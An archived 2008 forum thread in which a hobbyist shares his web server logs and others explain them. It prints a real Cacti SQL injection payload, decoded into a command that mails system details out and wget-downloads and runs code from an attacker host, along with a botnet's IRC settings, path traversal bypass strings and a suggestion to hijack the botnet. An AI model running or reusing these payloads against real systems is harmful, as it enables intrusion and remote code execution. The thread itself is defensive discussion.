• Welcome to Valhalla Legends Archive.
 

Is somone trying to hax0r my site?

Started by Ringo, February 06, 2008, 12:22 AM

Previous topic - Next topic

Ringo

So, i wrote some little vb6 web server awhile back to convert binary data to html pages for d2 players to view, but i noticed today i had the following requests, and am just wundering if anyone knows what they are trying to do? lol
Quote
[01:14:00] [Client 0] Querying: \cacti\cmd.php

[05:40:40] [Client 0] Querying: \cacti\cmd.php?1+1111)\**\UNION\**\SELECT\**\
2,0,1,1,CHAR(49,50,55,46,48,46,48,46,49),null,1,null,null,161,500,CHAR(112,114,111,99),null,1,300,0,CHAR
(32,47,115,98,105,110,47,105,102,99,111,110,102,105,103,32,124,32,103,114,101,112,32,105,110,101,
116,32,62,32,47,116,109,112,47,111,117,116,59,32,117,110,97,109,101,32,45,97,32,62,62,32,47,116,109,
112,47,111,117,116,59,32,117,112,116,105,109,101,32,62,62,32,47,116,109,112,47,111,117,116,59,32,99,
97,116,32,47,116,109,112,47,111,117,116,32,124,32,109,97,105,108,32,45,115,32,56,52,46,57,46,57,52,46,
50,51,51,32,104,97,99,107,101,100,32,97,108,101,120,97,97,97,56,57,64,121,97,104,111,111,46,99,111,109,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,32,45,79,32,
47,116,109,112,47,116,59,99,104,109,111,100,32,43,120,32,47,116,109,112,47,116,59,47,116,109,112,47,116,
59,119,103,101,116,32,119,119,119,46,97,108,101,120,117,116,122,46,97,115,46,114,111,47,116,46,112,108,32,
45,79,32,47,116,109,112,47,116,46,112,108,59,112,101,114,108,32,47,116,109,112,47,116,46,112,108,32,62,32,46,
47,114,114,97,47,115,117,110,116,122,117,46,108,111,103),null,null\**\FROM\**\host\*+11111

[05:41:13] Connection From 69.42.162.18:18613
[05:41:13] [Client 0] Querying: \cacti\rra\suntzu.log

What are they trying to do? hax it?

Sry if this is wrong forum, just interested to know what they think they are going to accomplish.

edit: Just converted that mumbo jumbo char's to a string and got the following:

/sbin/ifconfig | grep inet > /tmp/out; uname -a >> /tmp/out; uptime >> /tmp/out;
cat /tmp/out | mail -s XX.X.XX.XXX hacked [email protected];wget www.alexutz.as.ro/t -O /tmp/t;
chmod +x /tmp/t;/tmp/t;wget www.alexutz.as.ro/t.pl -O /tmp/t.pl;perl /tmp/t.pl > ./rra/suntzu.log

Lol
Aside, XX.X.XX.XXX was my ip

[Kp edit: broke up the command line.  It broke the table.]

Barabajagal

You should send them an E-Mail telling them to try again, but this time do it right.

Ringo

lol
Anyone have any idea what they were trying to get saved to \cacti\rra\suntzu.log?
I get the jist they were trying to get my server to email them of success, but i have almost no exp with web server software (hence wrote my own) but surely it cant be that easy to hax a site?
All they got from me was "Page can not be found" heh

iago

That looks like a totally automated attack, unless you actually have "cmd.php".. probably somebody scanning random IP ranges.
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Ringo

ah, Cool, nothing to worry about then. (nah i dont have any php files, idk any php)
They also tryed it the day before i think, because i forgot to add error handling for opening files, because my server crashed with the run time error "bad file number or name" :(
thx for info

Kp

I concur, that looks automated.  It was meant to mail the IP address, system architecture and kernel version, and uptime to the specified e-mail address.  It would then download additional code using wget and execute that.  That command line requires tools that're standard on Unix systems, but they're not standard on Windows.

The content of that suntzu.log would be whatever was printed by the Perl script.  Someone would have to download the script and examine it to find out what it prints.

As an aside, whoever wrote that wasn't very good.  There's no need to create so many temporary files.
[19:20:23] (BotNet) <[vL]Kp> Any idiot can make a bot with CSB, and many do!

Ringo

Ah  ::)
To bad for them I guess, that sounds kinda lame  :'(
Thx for info, at least I know what they were up to now :P
Im gonner put some funny text for them in \cacti\cmd.php just incase they do it again.

mynameistmp

If you want to know more, i'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.
"This idea is so odd, it is hard to know where to begin in challenging it." - Martin Barker, British scholar

iago

Quote from: mynameistmp on February 06, 2008, 09:45 PM
If you want to know more, i'd suggest connecting to this ircd:

Quote
my @adms=("`aleXutz");
my @canais=("#FreeForAll")
$servidor='irc.iceman.ro' unless $servidor;
my $porta='9999';

Odds are pretty good that you could commandeer the entire botnet.

You'd be well advised to be careful doing that, as well. Make sure you're bouncing through an anonymous proxy (or tor).
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Newby

- Newby

Quote[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

Quote<TehUser> Man, I can't get Xorg to work properly.  This sucks.
<torque> you should probably kill yourself
<TehUser> I think I will.  Thanks, torque.

Ringo

Hm, I got another strange one today (seem to get this one alot)

[09:04:11] Connection From 67.19.246.130:29261
[09:04:11] Item Drop Rate Pages Updated In 32ms
[09:04:11] [Client 1] Querying: \cgi-bin\firmwarecfg


[09:04:11] [Client 1] Connection Closed.

Im guessing this one is automated as well, and is some kind of configeration file?
Would it be wise for me to IP ban clients that request files from \cacti\ and \cgi-bin\?
I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code)

Newby

#11
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code)

I doubt that would ever happen. And if it's possible for that to happen, you're asking for someone here to decode the original message, get your IP, and poke around until we find it and post it here for all of us to enjoy. :P

Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
- Newby

Quote[17:32:45] * xar sets mode: -oooooooooo algorithm ban chris cipher newby stdio TehUser tnarongi|away vursed warz
[17:32:54] * xar sets mode: +o newby
[17:32:58] <xar> new rule
[17:33:02] <xar> me and newby rule all

Quote<TehUser> Man, I can't get Xorg to work properly.  This sucks.
<torque> you should probably kill yourself
<TehUser> I think I will.  Thanks, torque.

Ringo

Quote from: Newby on February 11, 2008, 03:58 PM
Quote from: Ringo on February 11, 2008, 03:23 AM
I was a little worryed one day somone will request \Project1.vbp :P (so i moved the source code)
Curious: do you catch ".."? i.e. can I request "\..\..\..\..\..\..\WINDOWS\explorer.exe"
Haha, i just tryed with iexporer and got:
[22:11:38] [Client 0] Querying: \test.txt
Then tryed it from a program i was useing to open pages to view html with, and got:
[22:26:30] [Client 0] Querying: \..\test.txt
and in the requesting program:

[22:26:30] HTTP/1.1 200 OK
Date: Mon, 11 Feb 2008 22:26:30
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

OMFG this is a test
LOL


So, yeah, you could have back pathed to that file :D
Not any more tho. :)
I was wundering the other day if its possible to back path, wow lol.
Thanks for bringing that to my attention :P
Is there any other way to back path like that?

iago

If you're removing ../, make sure you also pick up the unicode variations and malformed versions (ie, does .%00./ work? Does ...///../// work? Does ..%ff/ work?

There have been countless problems like that plaguing IIS over the years.
This'll make an interesting test for broken AV:
QuoteX5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Ringo

ooch, thanks
Atm im just nurfing it like this:

    strFilePath = Replace(strFilePath, "/", "\")
    strFilePath = Replace(strFilePath, "..", "")
    strFilePath = Replace(strFilePath, "\\", "\")
    If InStr(1, strFilePath, "D2HTMLServer", vbTextCompare) > 0 Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    ElseIf IsValidFile(strFilePath) = False Then
        Call SendWebPage(App.Path & "\Error.html")
        Exit Sub
    End If

IsValidFile() would handle any errors opening the file, mainly checking for invalid characters and removing them (% being one)
Im guessing it would be a good idea, next time my cpu is idle, to brute force the dir() function and log any succesfull backpathing?